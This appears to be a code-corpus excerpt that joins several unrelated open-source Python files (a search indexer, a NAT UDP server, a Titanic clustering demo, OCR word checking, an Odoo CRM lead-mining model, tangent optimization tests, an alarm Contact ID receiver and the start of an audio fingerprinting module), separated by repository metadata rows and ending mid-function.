if text is not None:
text = text.decode('utf-8')
text = pattern.sub(" ", text)
text = removeStopWords(text)
try :
db.execute(query, (pack.decode('utf-8'), title, text,))
except Exception, e:
print "error:", e
return
db.commit()
## Create tables if they don't exist, index argument-passed content pack, create database entries
def main(pathToManifest, PackName, pathToGlobalSearch=None, zipName=None, versionPath=None, author=None):
db = dbs.connect(pathToManifest+"/search.db")
createTable(db)
insertData(PackName, pathToManifest, db)
db.close()
if (pathToGlobalSearch) :
db = dbs.connect(pathToGlobalSearch+"/search.db")
createTable(db)
createTableUpper(db)
insertData(PackName, pathToManifest, db, zipName,versionPath, author)
db.close()
## And now ... get to work.
if __name__ == "__main__" :
path = sys.argv[1]
pack = sys.argv[2]
globalDb = None
zipName = None
versionPath = None
author = None
if len(sys.argv) > 3 :
globalDb = sys.argv[3]
if len(sys.argv) > 4 :
zipName = sys.argv[4]
if len(sys.argv) > 5 :
versionPath = sys.argv[5]
author = sys.argv[6]
main(path, pack, globalDb, zipName, versionPath, author)
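## Example invocation (all paths and names below are hypothetical):
##   python FTS.py /packs/MyPack MyPack /var/www/global qDir-MyPack /packs/MyPack/version.json "Jane Doe"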
| gpl-3.0 | 3,676,473,972,005,454,000 | 27.437838 | 123 | 0.657099 | false | 3.1731 | false | false | false |
madformuse/server | server/natpacketserver.py | 1 | 1848 | import socket
from server.subscribable import Subscribable
from .decorators import with_logger
@with_logger
class NatPacketServer(Subscribable):
def __init__(self, loop, port):
super().__init__()
self.loop = loop
self.port = port
self._logger.debug("{id} Listening on {port}".format(id=id(self), port=port))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', port))
s.setblocking(False)
loop.add_reader(s.fileno(), self._recv)
self._socket = s
self._subscribers = {}
def close(self):
        self.loop.remove_reader(self._socket.fileno())
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as ex:
self._logger.exception(ex)
finally:
self._socket.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
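    # Datagrams whose first byte is 0x08 are treated as NAT hole-punching probes:
    # the payload is forwarded to subscribers as a ProcessServerNatPacket command
    # and the sender receives a b"\x08OK" acknowledgement.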
def _recv(self):
try:
data, addr = self._socket.recvfrom(512)
self._logger.debug("Received UDP {} from {}".format(data, addr))
if data[0] == 0x8:
self._logger.debug("Emitting with: {} {} {} ".format(data[1:].decode(),
addr[0], addr[1]))
self.notify({
'command_id': 'ProcessServerNatPacket',
'arguments': ["{}:{}".format(addr[0], addr[1]), data[1:].decode()]
})
self._socket.sendto(b"\x08OK", addr)
except OSError as ex:
if ex.errno == socket.EWOULDBLOCK:
pass
else:
self._logger.critical(ex)
raise ex
except Exception as ex:
self._logger.critical(ex)
raise ex
| gpl-3.0 | -7,447,576,450,279,924,000 | 31.421053 | 87 | 0.523268 | false | 3.882353 | false | false | false |
rossweinstein/Evolutionary-Computing-Python | src/main/Main.py | 1 | 1131 | from src.ecSystem.ECSystem import ECSystem
from src.ecSystem.ECSystemParameters import ECSystemParameters
# Where we actually run our EC System
params = ECSystemParameters()
# Governs the number of expressions in each generation
params.generation_size = 200
# Governs the length of the expressions in the initial population
params.genome_size = 15
# The percentage of the population selected for the next generation
params.fitness_threshold = 0.2
# If our fitness is not improving over this set number of generations, the EC System reboots
params.stagnation_threshold = 30
# The percentage of the population selected for mutation
params.mutation_percentage = .1
# Minimum fitness value required for the system to deem the expression equivalent to training data
params.success_threshold = 0.01
# Training Data: The x and y values used to evaluate the expression's fitness
params.x_training_data = [-55.0, -35.0, -11.0, -1.0, 1.0, 19.0, 87.0, 101.0]
params.y_training_data = [1512.0, 612.0, 60, 0.0, 0.0, 180.0, 3784, 5100.0]
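# Note: every sample point satisfies y = (x**2 - 1) / 2, which is presumably the
# target function the EC run is expected to rediscover.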
ec_system = ECSystem(params)
ec_system.run_ec_system()
# System results
print(ec_system.stats)
| mit | 5,219,184,992,717,285,000 | 32.264706 | 98 | 0.769231 | false | 3.25 | false | false | false |
tung18tht/ICDAR-2017-Post-OCR-Correction | errors_detection/find_suspicious_eng_words.py | 1 | 1754 | import os, linecache, re, json
work_directory_path = os.path.dirname(os.path.realpath(__file__))
eng_words_file = open(work_directory_path + "/eng_words.txt", "rU")
eng_words = set()
for word in eng_words_file:
eng_words |= {word.rstrip()}
data_directory_path = work_directory_path + "/ICDAR2017_datasetPostOCR_Evaluation_2M_v1.2"
eng_data_directory_paths = [data_directory_path + "/eng_monograph", data_directory_path + "/eng_periodical"]
output_file = open(work_directory_path + "/Results/result_eng_words.json", "w")
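# Output format: one JSON entry per evaluated file, keyed by "<parent_dir>/<file>";
# its value maps "<character_offset>:1" to an empty object for every token that is
# not found in the English word list (no correction candidates are suggested).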
output_file.write("{")
for eng_data_directory_path in eng_data_directory_paths:
for root_path, directories, files in os.walk(eng_data_directory_path):
for file in files:
if os.path.splitext(file)[1] == ".txt":
output_file.write("\n \""+os.path.basename(root_path)+"/"+file+"\": ")
errors = {}
file_path = root_path + "/" + file
ocr_output = linecache.getline(file_path, 1)[14:].strip()
word_begin_index = 0
for i, character in enumerate(ocr_output):
if character == ' ':
word_end_index = i
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:word_end_index].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
word_begin_index = word_end_index + 1
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
output_file.write(json.dumps(errors, indent=8)+",")
output_file.seek(0, 2)
output_file.truncate(output_file.tell() - 1)
output_file = open(work_directory_path + "/Results/result_eng_words.json", "a")
output_file.write("\n}") | mit | 7,360,763,077,504,529,000 | 36.340426 | 108 | 0.622007 | false | 3.137746 | false | false | false |
loli/medpy | doc/numpydoc/numpydoc/comment_eater.py | 1 | 5357 |
import sys
if sys.version_info[0] >= 3:
from io import StringIO
else:
    from StringIO import StringIO
import compiler
import inspect
import textwrap
import tokenize
from .compiler_unparse import unparse
class Comment(object):
""" A comment block.
"""
is_comment = True
def __init__(self, start_lineno, end_lineno, text):
# int : The first line number in the block. 1-indexed.
self.start_lineno = start_lineno
# int : The last line number. Inclusive!
self.end_lineno = end_lineno
# str : The text block including '#' character but not any leading spaces.
self.text = text
def add(self, string, start, end, line):
""" Add a new comment line.
"""
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
self.text += string
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno, self.text)
class NonComment(object):
""" A non-comment block of code.
"""
is_comment = False
def __init__(self, start_lineno, end_lineno):
self.start_lineno = start_lineno
self.end_lineno = end_lineno
def add(self, string, start, end, line):
""" Add lines to the block.
"""
if string.strip():
# Only add if not entirely whitespace.
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno)
class CommentBlocker(object):
""" Pull out contiguous comment blocks.
"""
def __init__(self):
# Start with a dummy.
self.current_block = NonComment(0, 0)
# All of the blocks seen so far.
self.blocks = []
# The index mapping lines of code to their associated comment blocks.
self.index = {}
def process_file(self, file):
""" Process a file object.
"""
if sys.version_info[0] >= 3:
nxt = file.__next__
else:
            nxt = file.next
for token in tokenize.generate_tokens(nxt):
self.process_token(*token)
self.make_index()
def process_token(self, kind, string, start, end, line):
""" Process a single token.
"""
if self.current_block.is_comment:
if kind == tokenize.COMMENT:
self.current_block.add(string, start, end, line)
else:
self.new_noncomment(start[0], end[0])
else:
if kind == tokenize.COMMENT:
self.new_comment(string, start, end, line)
else:
self.current_block.add(string, start, end, line)
def new_noncomment(self, start_lineno, end_lineno):
""" We are transitioning from a noncomment to a comment.
"""
block = NonComment(start_lineno, end_lineno)
self.blocks.append(block)
self.current_block = block
def new_comment(self, string, start, end, line):
""" Possibly add a new comment.
Only adds a new comment if this comment is the only thing on the line.
Otherwise, it extends the noncomment block.
"""
prefix = line[:start[1]]
if prefix.strip():
# Oops! Trailing comment, not a comment block.
self.current_block.add(string, start, end, line)
else:
# A comment block.
block = Comment(start[0], end[0], string)
self.blocks.append(block)
self.current_block = block
def make_index(self):
""" Make the index mapping lines of actual code to their associated
prefix comments.
"""
for prev, block in zip(self.blocks[:-1], self.blocks[1:]):
if not block.is_comment:
self.index[block.start_lineno] = prev
def search_for_comment(self, lineno, default=None):
""" Find the comment block just before the given line number.
Returns None (or the specified default) if there is no such block.
"""
if not self.index:
self.make_index()
block = self.index.get(lineno, None)
text = getattr(block, 'text', default)
return text
def strip_comment_marker(text):
""" Strip # markers at the front of a block of comment text.
"""
lines = []
for line in text.splitlines():
lines.append(line.lstrip('#'))
text = textwrap.dedent('\n'.join(lines))
return text
def get_class_traits(klass):
""" Yield all of the documentation for trait definitions on a class object.
"""
# FIXME: gracefully handle errors here or in the caller?
source = inspect.getsource(klass)
cb = CommentBlocker()
cb.process_file(StringIO(source))
mod_ast = compiler.parse(source)
class_ast = mod_ast.node.nodes[0]
for node in class_ast.code.nodes:
# FIXME: handle other kinds of assignments?
if isinstance(node, compiler.ast.Assign):
name = node.nodes[0].name
rhs = unparse(node.expr).strip()
doc = strip_comment_marker(cb.search_for_comment(node.lineno, default=''))
yield name, rhs, doc
| gpl-3.0 | -5,297,312,438,764,370,000 | 30.698225 | 86 | 0.581296 | false | 3.953506 | false | false | false |
jeremiahyan/odoo | addons/crm_iap_lead/models/crm_iap_lead_mining_request.py | 1 | 15651 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
from odoo import api, fields, models, _
from odoo.addons.iap.tools import iap_tools
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
DEFAULT_ENDPOINT = 'https://iap-services.odoo.com'
MAX_LEAD = 200
MAX_CONTACT = 5
CREDIT_PER_COMPANY = 1
CREDIT_PER_CONTACT = 1
class CRMLeadMiningRequest(models.Model):
_name = 'crm.iap.lead.mining.request'
_description = 'CRM Lead Mining Request'
def _default_lead_type(self):
if self.env.user.has_group('crm.group_use_lead'):
return 'lead'
else:
return 'opportunity'
def _default_country_ids(self):
return self.env.user.company_id.country_id
name = fields.Char(string='Request Number', required=True, readonly=True, default=lambda self: _('New'), copy=False)
state = fields.Selection([('draft', 'Draft'), ('error', 'Error'), ('done', 'Done')], string='Status', required=True, default='draft')
# Request Data
lead_number = fields.Integer(string='Number of Leads', required=True, default=3)
search_type = fields.Selection([('companies', 'Companies'), ('people', 'Companies and their Contacts')], string='Target', required=True, default='companies')
error_type = fields.Selection([
('credits', 'Insufficient Credits'),
('no_result', 'No Result'),
], string='Error Type', readonly=True)
# Lead / Opportunity Data
lead_type = fields.Selection([('lead', 'Leads'), ('opportunity', 'Opportunities')], string='Type', required=True, default=_default_lead_type)
display_lead_label = fields.Char(compute='_compute_display_lead_label')
team_id = fields.Many2one(
'crm.team', string='Sales Team', ondelete="set null",
domain="[('use_opportunities', '=', True)]", readonly=False, compute='_compute_team_id', store=True)
user_id = fields.Many2one('res.users', string='Salesperson', default=lambda self: self.env.user)
tag_ids = fields.Many2many('crm.tag', string='Tags')
lead_ids = fields.One2many('crm.lead', 'lead_mining_request_id', string='Generated Lead / Opportunity')
lead_count = fields.Integer(compute='_compute_lead_count', string='Number of Generated Leads')
# Company Criteria Filter
filter_on_size = fields.Boolean(string='Filter on Size', default=False)
company_size_min = fields.Integer(string='Size', default=1)
company_size_max = fields.Integer(default=1000)
country_ids = fields.Many2many('res.country', string='Countries', default=_default_country_ids)
state_ids = fields.Many2many('res.country.state', string='States')
available_state_ids = fields.One2many('res.country.state', compute='_compute_available_state_ids',
help="List of available states based on selected countries")
industry_ids = fields.Many2many('crm.iap.lead.industry', string='Industries')
# Contact Generation Filter
contact_number = fields.Integer(string='Number of Contacts', default=10)
contact_filter_type = fields.Selection([('role', 'Role'), ('seniority', 'Seniority')], string='Filter on', default='role')
preferred_role_id = fields.Many2one('crm.iap.lead.role', string='Preferred Role')
role_ids = fields.Many2many('crm.iap.lead.role', string='Other Roles')
seniority_id = fields.Many2one('crm.iap.lead.seniority', string='Seniority')
# Fields for the blue tooltip
lead_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_contacts_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_total_credits = fields.Char(compute='_compute_tooltip', readonly=True)
@api.depends('lead_type', 'lead_number')
def _compute_display_lead_label(self):
selection_description_values = {
e[0]: e[1] for e in self._fields['lead_type']._description_selection(self.env)}
for request in self:
lead_type = selection_description_values[request.lead_type]
request.display_lead_label = '%s %s' % (request.lead_number, lead_type)
@api.onchange('lead_number', 'contact_number')
def _compute_tooltip(self):
for record in self:
company_credits = CREDIT_PER_COMPANY * record.lead_number
contact_credits = CREDIT_PER_CONTACT * record.contact_number
total_contact_credits = contact_credits * record.lead_number
record.lead_contacts_credits = _("Up to %d additional credits will be consumed to identify %d contacts per company.") % (contact_credits*company_credits, record.contact_number)
record.lead_credits = _('%d credits will be consumed to find %d companies.') % (company_credits, record.lead_number)
record.lead_total_credits = _("This makes a total of %d credits for this request.") % (total_contact_credits + company_credits)
@api.depends('lead_ids.lead_mining_request_id')
def _compute_lead_count(self):
if self.ids:
leads_data = self.env['crm.lead'].read_group(
[('lead_mining_request_id', 'in', self.ids)],
['lead_mining_request_id'], ['lead_mining_request_id'])
else:
leads_data = []
mapped_data = dict(
(m['lead_mining_request_id'][0], m['lead_mining_request_id_count'])
for m in leads_data)
for request in self:
request.lead_count = mapped_data.get(request.id, 0)
@api.depends('user_id', 'lead_type')
def _compute_team_id(self):
""" When changing the user, also set a team_id or restrict team id
to the ones user_id is member of. """
for mining in self:
# setting user as void should not trigger a new team computation
if not mining.user_id:
continue
user = mining.user_id
if mining.team_id and user in mining.team_id.member_ids | mining.team_id.user_id:
continue
team_domain = [('use_leads', '=', True)] if mining.lead_type == 'lead' else [('use_opportunities', '=', True)]
team = self.env['crm.team']._get_default_team_id(user_id=user.id, domain=team_domain)
mining.team_id = team.id
@api.depends('country_ids')
def _compute_available_state_ids(self):
""" States for some specific countries should not be offered as filtering options because
they drastically reduce the amount of IAP reveal results.
For example, in Belgium, only 11% of companies have a defined state within the
reveal service while the rest of them have no state defined at all.
Meaning specifying states for that country will yield a lot less results than what you could
expect, which is not the desired behavior.
Obviously all companies are active within a state, it's just a lack of data in the reveal
service side.
To help users create meaningful iap searches, we only keep the states filtering for several
whitelisted countries (based on their country code).
The complete list and reasons for this change can be found on task-2471703. """
for lead_mining_request in self:
countries = lead_mining_request.country_ids.filtered(lambda country:
country.code in iap_tools._STATES_FILTER_COUNTRIES_WHITELIST)
lead_mining_request.available_state_ids = self.env['res.country.state'].search([
('country_id', 'in', countries.ids)
])
@api.onchange('available_state_ids')
def _onchange_available_state_ids(self):
self.state_ids -= self.state_ids.filtered(
lambda state: (state._origin.id or state.id) not in self.available_state_ids.ids
)
@api.onchange('lead_number')
def _onchange_lead_number(self):
if self.lead_number <= 0:
self.lead_number = 1
elif self.lead_number > MAX_LEAD:
self.lead_number = MAX_LEAD
@api.onchange('contact_number')
def _onchange_contact_number(self):
if self.contact_number <= 0:
self.contact_number = 1
elif self.contact_number > MAX_CONTACT:
self.contact_number = MAX_CONTACT
@api.onchange('country_ids')
def _onchange_country_ids(self):
self.state_ids = []
@api.onchange('company_size_min')
def _onchange_company_size_min(self):
if self.company_size_min <= 0:
self.company_size_min = 1
elif self.company_size_min > self.company_size_max:
self.company_size_min = self.company_size_max
@api.onchange('company_size_max')
def _onchange_company_size_max(self):
if self.company_size_max < self.company_size_min:
self.company_size_max = self.company_size_min
def _prepare_iap_payload(self):
"""
This will prepare the data to send to the server
"""
self.ensure_one()
payload = {'lead_number': self.lead_number,
'search_type': self.search_type,
'countries': self.country_ids.mapped('code')}
if self.state_ids:
payload['states'] = self.state_ids.mapped('code')
if self.filter_on_size:
payload.update({'company_size_min': self.company_size_min,
'company_size_max': self.company_size_max})
if self.industry_ids:
# accumulate all reveal_ids (separated by ',') into one list
# eg: 3 records with values: "175,176", "177" and "190,191"
# will become ['175','176','177','190','191']
all_industry_ids = [
reveal_id.strip()
for reveal_ids in self.mapped('industry_ids.reveal_ids')
for reveal_id in reveal_ids.split(',')
]
payload['industry_ids'] = all_industry_ids
if self.search_type == 'people':
payload.update({'contact_number': self.contact_number,
'contact_filter_type': self.contact_filter_type})
if self.contact_filter_type == 'role':
payload.update({'preferred_role': self.preferred_role_id.reveal_id,
'other_roles': self.role_ids.mapped('reveal_id')})
elif self.contact_filter_type == 'seniority':
payload['seniority'] = self.seniority_id.reveal_id
return payload
def _perform_request(self):
"""
This will perform the request and create the corresponding leads.
The user will be notified if he hasn't enough credits.
"""
self.error_type = False
server_payload = self._prepare_iap_payload()
reveal_account = self.env['iap.account'].get('reveal')
dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')
endpoint = self.env['ir.config_parameter'].sudo().get_param('reveal.endpoint', DEFAULT_ENDPOINT) + '/iap/clearbit/1/lead_mining_request'
params = {
'account_token': reveal_account.account_token,
'dbuuid': dbuuid,
'data': server_payload
}
try:
response = iap_tools.iap_jsonrpc(endpoint, params=params, timeout=300)
if not response.get('data'):
self.error_type = 'no_result'
return False
return response['data']
except iap_tools.InsufficientCreditError as e:
self.error_type = 'credits'
self.state = 'error'
return False
except Exception as e:
raise UserError(_("Your request could not be executed: %s", e))
def _create_leads_from_response(self, result):
""" This method will get the response from the service and create the leads accordingly """
self.ensure_one()
lead_vals_list = []
messages_to_post = {}
for data in result:
lead_vals_list.append(self._lead_vals_from_response(data))
template_values = data['company_data']
template_values.update({
'flavor_text': _("Opportunity created by Odoo Lead Generation"),
'people_data': data.get('people_data'),
})
messages_to_post[data['company_data']['clearbit_id']] = template_values
leads = self.env['crm.lead'].create(lead_vals_list)
for lead in leads:
if messages_to_post.get(lead.reveal_id):
lead.message_post_with_view('iap_mail.enrich_company', values=messages_to_post[lead.reveal_id], subtype_id=self.env.ref('mail.mt_note').id)
# Methods responsible for format response data into valid odoo lead data
@api.model
def _lead_vals_from_response(self, data):
self.ensure_one()
company_data = data.get('company_data')
people_data = data.get('people_data')
lead_vals = self.env['crm.iap.lead.helpers'].lead_vals_from_response(self.lead_type, self.team_id.id, self.tag_ids.ids, self.user_id.id, company_data, people_data)
lead_vals['lead_mining_request_id'] = self.id
return lead_vals
@api.model
def get_empty_list_help(self, help):
help_title = _('Create a Lead Mining Request')
sub_title = _('Generate new leads based on their country, industry, size, etc.')
return '<p class="o_view_nocontent_smiling_face">%s</p><p class="oe_view_nocontent_alias">%s</p>' % (help_title, sub_title)
def action_draft(self):
self.ensure_one()
self.name = _('New')
self.state = 'draft'
def action_submit(self):
self.ensure_one()
if self.name == _('New'):
self.name = self.env['ir.sequence'].next_by_code('crm.iap.lead.mining.request') or _('New')
results = self._perform_request()
if results:
self._create_leads_from_response(results)
self.state = 'done'
if self.lead_type == 'lead':
return self.action_get_lead_action()
elif self.lead_type == 'opportunity':
return self.action_get_opportunity_action()
elif self.env.context.get('is_modal'):
# when we are inside a modal already, we re-open the same record
# that way, the form view is updated and the correct error message appears
# (sadly, there is no way to simply 'reload' a form view within a modal)
return {
'name': _('Generate Leads'),
'res_model': 'crm.iap.lead.mining.request',
'views': [[False, 'form']],
'target': 'new',
'type': 'ir.actions.act_window',
'res_id': self.id,
'context': dict(self.env.context, edit=True, form_view_initial_mode='edit')
}
else:
# will reload the form view and show the error message on top
return False
def action_get_lead_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_all_leads")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'lead')]
return action
def action_get_opportunity_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_opportunities")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'opportunity')]
return action
def action_buy_credits(self):
return {
'type': 'ir.actions.act_url',
'url': self.env['iap.account'].get_credits_url(service_name='reveal'),
}
| gpl-3.0 | 4,967,390,844,346,431,000 | 45.580357 | 188 | 0.615104 | false | 3.729092 | false | false | false |
Rocamadour7/ml_tutorial | 05. Clustering/titanic-data-example.py | 1 | 1721 | import numpy as np
from sklearn.cluster import KMeans
from sklearn import preprocessing
import pandas as pd
'''
Pclass Passenger Class (1 = 1st; 2 = 2nd; 3 = 3rd)
survival Survival (0 = No; 1 = Yes)
name Name
sex Sex
age Age
sibsp Number of Siblings/Spouses Aboard
parch Number of Parents/Children Aboard
ticket Ticket Number
fare Passenger Fare (British pound)
cabin Cabin
embarked Port of Embarkation (C = Cherbourg; Q = Queenstown; S = Southampton)
boat Lifeboat
body Body Identification Number
home.dest Home/Destination
'''
df = pd.read_excel('titanic.xls')
df.drop(['body', 'name'], 1, inplace=True)
df.fillna(0, inplace=True)
def handle_non_numerical_data(df):
columns = df.columns.values
for column in columns:
text_digit_vals = {}
def convert_to_int(val):
return text_digit_vals[val]
if df[column].dtype != np.int64 and df[column].dtype != np.float64:
column_contents = df[column].values.tolist()
unique_elements = set(column_contents)
x = 0
for unique in unique_elements:
if unique not in text_digit_vals:
text_digit_vals[unique] = x
x += 1
df[column] = list(map(convert_to_int, df[column]))
return df
df = handle_non_numerical_data(df)
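# After conversion the former text columns (e.g. 'sex', 'embarked', 'cabin') hold
# arbitrary small integer codes; the mapping is not ordinal, it only makes the
# data digestible for KMeans.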
X = np.array(df.drop(['survived'], 1).astype(float))
X = preprocessing.scale(X)
y = np.array(df['survived'])
clf = KMeans(n_clusters=2)
clf.fit(X)
correct = 0
for i in range(len(X)):
predict_me = np.array(X[i].astype(float))
predict_me = predict_me.reshape(-1, len(predict_me))
prediction = clf.predict(predict_me)
if prediction[0] == y[i]:
correct += 1
print(correct/len(X))
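# KMeans assigns its two cluster labels arbitrarily, so a score close to 0 is as
# informative as the same score close to 1 (the labels are simply swapped).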
| mit | 7,085,823,906,355,869,000 | 26.31746 | 77 | 0.646717 | false | 3.106498 | false | false | false |
scudre/alarm-central-station-receiver | alarm_central_station_receiver/contact_id/callup.py | 1 | 3225 | """
Copyright (2018) Chris Scuderi
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import re
from alarm_central_station_receiver.contact_id import handshake
def calc_checksum(code):
checksum = 0
for digit in code:
# 0 is treated as 10 in the checksum calculation
checksum += int(digit, 16) if digit != '0' else 10
return checksum % 15
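# A well-formed Contact ID message sums to a multiple of 15 once '0' digits are
# counted as 10, so calc_checksum() returns 0 for valid codes.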
def parse_alarm_codes(code_str):
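    # Contact ID messages are normally 16 DTMF digits: AAAA 18 Q EEE GG ZZZ C,
    # i.e. account, message type "18", qualifier (1/3/6), event code, partition,
    # zone, checksum. The final digit is optional in the pattern because the
    # checksum is not always detected reliably (see the hacks below).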
pattern = "([0-9]{4}18[136][0-9abcdef]{8}[0-9abcdef]?(?![0-9]{3}18[136]))"
codes = []
for code in re.split(pattern, code_str):
if not code:
continue
# There seems to be some buggyness with either TigerJet or the alarm system
# when sending the last checksum digit when its above 'c'
if len(code) == 15:
# XXX hack - Tigerjet can't detect the highest DTMF code of 15
if calc_checksum(code) == 0:
code += 'f'
# XXX hack - Tigerjet can't detect the high DTMF code of 14
if calc_checksum(code) == 1:
code += 'e'
if calc_checksum(code) == 2:
code += 'd'
codes.append((code, calc_checksum(code) == 0))
return codes
def collect_alarm_codes(fd):
logging.info("Collecting Alarm Codes")
code_str = ''
# Play the alarm handshake to start getting the codes
with handshake.Handshake():
off_hook, digit = get_phone_status(fd)
while off_hook:
code_str += format(digit, 'x') if digit != -1 else ''
off_hook, digit = get_phone_status(fd)
logging.info("Alarm Hung Up")
logging.info('Code String: %s', code_str)
return code_str
def validate_alarm_call_in(fd, expected):
number = '000'
off_hook, digit = get_phone_status(fd)
if off_hook:
logging.info("Phone Off The Hook")
while off_hook:
if digit != -1:
logging.debug("Digit %d", digit)
number = number[1:] + format(digit, 'x')
logging.debug("Number %s", number)
if number == expected:
logging.info("Alarm Call In Received")
break
off_hook, digit = get_phone_status(fd)
logging.debug("Number %s", number)
if not off_hook:
logging.info("Phone On The Hook")
return number == expected and off_hook
def get_phone_status(fd):
status = bytearray(fd.read(2))
digit = status[0]
if digit < 11:
digit = digit - 1
off_hook = ((status[1] & 0x80) == 0x80)
return (off_hook, digit)
def handle_alarm_calling(fd, number):
codes = []
if validate_alarm_call_in(fd, number):
code_str = collect_alarm_codes(fd)
codes = parse_alarm_codes(code_str)
return codes
| apache-2.0 | 6,096,464,687,842,636,000 | 26.801724 | 83 | 0.613953 | false | 3.698394 | false | false | false |
google/tangent | tests/test_optimization.py | 1 | 2734 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gast
import pytest
from tangent import optimization
from tangent import quoting
def test_assignment_propagation():
def f(x):
y = x
z = y
return z
node = quoting.parse_function(f)
node = optimization.assignment_propagation(node)
assert len(node.body[0].body) == 2
def test_dce():
def f(x):
y = 2 * x
return x
node = quoting.parse_function(f)
node = optimization.dead_code_elimination(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_fixed_point():
def f(x):
y = g(x)
z = h(y)
return x
node = quoting.parse_function(f)
node = optimization.optimize(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_constant_folding():
def f(x):
x = 1 * x
x = 0 * x
x = x * 1
x = x * 0
x = x * 2
x = 2 * x
x = 2 * 3
x = 1 + x
x = 0 + x
x = x + 1
x = x + 0
x = x + 2
x = 2 + x
x = 2 + 3
x = 1 - x
x = 0 - x
x = x - 1
x = x - 0
x = x - 2
x = 2 - x
x = 2 - 3
x = 1 / x
x = 0 / x
x = x / 1
x = x / 0
x = x / 2
x = 2 / x
x = 2 / 8
x = 1 ** x
x = 0 ** x
x = x ** 1
x = x ** 0
x = x ** 2
x = 2 ** x
x = 2 ** 3
def f_opt(x):
x = x
x = 0
x = x
x = 0
x = x * 2
x = 2 * x
x = 6
x = 1 + x
x = x
x = x + 1
x = x
x = x + 2
x = 2 + x
x = 5
x = 1 - x
x = -x
x = x - 1
x = x
x = x - 2
x = 2 - x
x = -1
x = 1 / x
x = 0 / x
x = x
x = x / 0
x = x / 2
x = 2 / x
x = 0.25
x = 1
x = 0
x = x
x = 1
x = x ** 2
x = 2 ** x
x = 8
node = quoting.parse_function(f)
node = optimization.constant_folding(node)
node_opt = quoting.parse_function(f_opt)
lines = quoting.to_source(node).strip().split('\n')[1:]
lines_opt = quoting.to_source(node_opt).strip().split('\n')[1:]
# In Python 2 integer division could be on, in which case...
if 1 / 2 == 0:
lines_opt[27] = ' x = 0'
assert lines == lines_opt
if __name__ == '__main__':
assert not pytest.main([__file__])
| apache-2.0 | 2,331,356,449,715,369,500 | 18.528571 | 79 | 0.517191 | false | 2.968512 | true | false | false |
huytd/dejavu | dejavu/fingerprint.py | 1 | 6020 | import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import (generate_binary_structure,
iterate_structure, binary_erosion)
import hashlib
from operator import itemgetter
IDX_FREQ_I = 0
IDX_TIME_J = 1
######################################################################
# Sampling rate, related to the Nyquist conditions, which affects
# the range frequencies we can detect.
DEFAULT_FS = 44100
######################################################################
# Size of the FFT window, affects frequency granularity
DEFAULT_WINDOW_SIZE = 4096
######################################################################
# Ratio by which each sequential window overlaps the last and the
# next window. Higher overlap will allow a higher granularity of offset
# matching, but potentially more fingerprints.
DEFAULT_OVERLAP_RATIO = 0.5
######################################################################
# Degree to which a fingerprint can be paired with its neighbors --
# higher will cause more fingerprints, but potentially better accuracy.
DEFAULT_FAN_VALUE = 15
######################################################################
# Minimum amplitude in spectrogram in order to be considered a peak.
# This can be raised to reduce number of fingerprints, but can negatively
# affect accuracy.
DEFAULT_AMP_MIN = 10
######################################################################
# Number of cells around an amplitude peak in the spectrogram in order
# for Dejavu to consider it a spectral peak. Higher values mean less
# fingerprints and faster matching, but can potentially affect accuracy.
PEAK_NEIGHBORHOOD_SIZE = 20
######################################################################
# Thresholds on how close or far fingerprints can be in time in order
# to be paired as a fingerprint. If your max is too low, higher values of
# DEFAULT_FAN_VALUE may not perform as expected.
MIN_HASH_TIME_DELTA = 0
MAX_HASH_TIME_DELTA = 200
######################################################################
# If True, will sort peaks temporally for fingerprinting;
# not sorting will cut down number of fingerprints, but potentially
# affect performance.
PEAK_SORT = True
######################################################################
# Number of bits to throw away from the front of the SHA1 hash in the
# fingerprint calculation. The more you throw away, the less storage, but
# potentially higher collisions and misclassifications when identifying songs.
FINGERPRINT_REDUCTION = 20
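# Minimal usage sketch (assumes `samples` is a 1-D array of mono PCM samples
# recorded at DEFAULT_FS):
#   hashes = list(fingerprint(samples))   # -> [(sha1_prefix, time_offset), ...]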
def fingerprint(channel_samples, Fs=DEFAULT_FS,
wsize=DEFAULT_WINDOW_SIZE,
wratio=DEFAULT_OVERLAP_RATIO,
fan_value=DEFAULT_FAN_VALUE,
